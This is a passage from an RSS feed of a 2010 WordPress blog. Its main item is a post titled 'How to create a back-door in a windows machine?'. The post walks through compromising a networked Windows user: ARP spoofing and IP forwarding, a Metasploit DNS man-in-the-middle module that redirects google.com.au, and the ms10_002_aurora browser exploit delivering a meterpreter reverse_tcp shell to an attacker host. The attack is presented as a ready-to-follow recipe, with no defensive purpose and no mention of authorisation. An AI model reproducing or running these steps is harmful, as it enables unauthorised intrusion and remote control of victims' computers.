href="http://feeds.wordpress.com/1.0/goreddit/sysit.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sysit.wordpress.com/10/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=10&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sysit.wordpress.com/2010/07/14/zfs-configuration-for-oracle-db/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08bf265d2e85cfbfa42ad9f4f15c1b79?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sysit</media:title>
		</media:content>
	</item>
		<item>
		<title>How to create a back-door in a windows machine ?</title>
		<link>http://sysit.wordpress.com/2010/07/09/how-to-create-a-back-door-in-a-windows-machine/</link>
		<comments>http://sysit.wordpress.com/2010/07/09/how-to-create-a-back-door-in-a-windows-machine/#comments</comments>
		<pubDate>Fri, 09 Jul 2010 15:20:28 +0000</pubDate>
		<dc:creator>sysit</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://sysit.wordpress.com/?p=5</guid>
		<description><![CDATA[  One of my friends asked me yesterday how to create a back-door in a windows machine ? the target machine was nothing special a normal windows with firewall enabled and up to date anti-virus The user was using just &#8230; <a href="http://sysit.wordpress.com/2010/07/09/how-to-create-a-back-door-in-a-windows-machine/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=5&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p> </p>
<p>One of my friends asked me yesterday how to create a back-door in a windows machine ? the target machine was nothing special a normal windows with firewall enabled and up to date anti-virus</p>
<p>The user was using just browser and email .First I tried to search the user machine for some unusual services but with no success , so it is obvious that I need to use functions of Metasploit framework</p>
<p>Now it is relay depends if the user is in the same network with you or not in my case the user was in the same network so now I need to make him visit “my site <img src='http://s2.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  “ , I will use dns-spoofing . The idea is to intercept the dns requests of the client and response with fake ip address of our web server , depends on situation and your network configuration you might have to use arp-spoofing to redirect traffic thru your server , so we can see the dns requests .</p>
<p>Arpspoof -i eth0 100.168.0.1,</p>
<p>now the dns server ip 100.168.0.1 is spoofed with our server mac !</p>
<p>Echo “1” &gt; /proc/sys/net/ipv4/ip_forward</p>
<p>to forward all incoming traffic</p>
<p>Now for DNS-spoofing in Metasploit there is fake dns but is is much easier to use Digininja module that can be downloaded from digininja.org/metasploit/dns_dhcp.php the biggest difference between two exploits that that one will retune fake responses just for names that stored in dns.txt file all other will be sent to the real dns server</p>
<p>now to the installation</p>
<p>download and unpack</p>
<p>directory dns_mitm move to auxiliary/server in merasploit framework</p>
<p>the lib directory from the archive is for dhcp_exhaustion module but we don’t need this module</p>
<p>no we will go to msfconsole</p>
<p>use auxiliary/server/dns_mitm/dns_mitm</p>
<p>set FILENAME /msf3/modules/auxiliary/server/dns.txt (this is where we will put all the fake dns entries)</p>
<p>set REALDNS 100.168.0.1</p>
<p>run -j</p>
<p>so now we have the module running ( all the path should be relative to metasploit directory and not the full path )</p>
<p>example for dns.txt file</p>
<p>100.168.0.100 google.com.au ( you can add entrees on the flight)</p>
<p>now we can create a web site with the exploit , the exploit should be chosen by the web browser that used by the user , for ie6 and up we will user meterpreter and Aurora .</p>
<p>Use exploit /windows/browser/ms10_002_aurora</p>
<p>set PAYLOAD windows/meterpreter/reverse_tcp</p>
<p>set LPORT 4444</p>
<p>set LHOST 100.168.0.100</p>
<p>set SRVPORT 80</p>
<p>set URIPATH /</p>
<p>exploit</p>
<p>And that it ! So when next time the user will try to brows google.com.au he will hit ouer server and now we have shell access</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sysit.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sysit.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sysit.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sysit.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sysit.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sysit.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sysit.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sysit.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sysit.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sysit.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sysit.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sysit.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sysit.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sysit.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=5&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sysit.wordpress.com/2010/07/09/how-to-create-a-back-door-in-a-windows-machine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08bf265d2e85cfbfa42ad9f4f15c1b79?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sysit</media:title>
		</media:content>
	</item>
	</channel>
</rss>
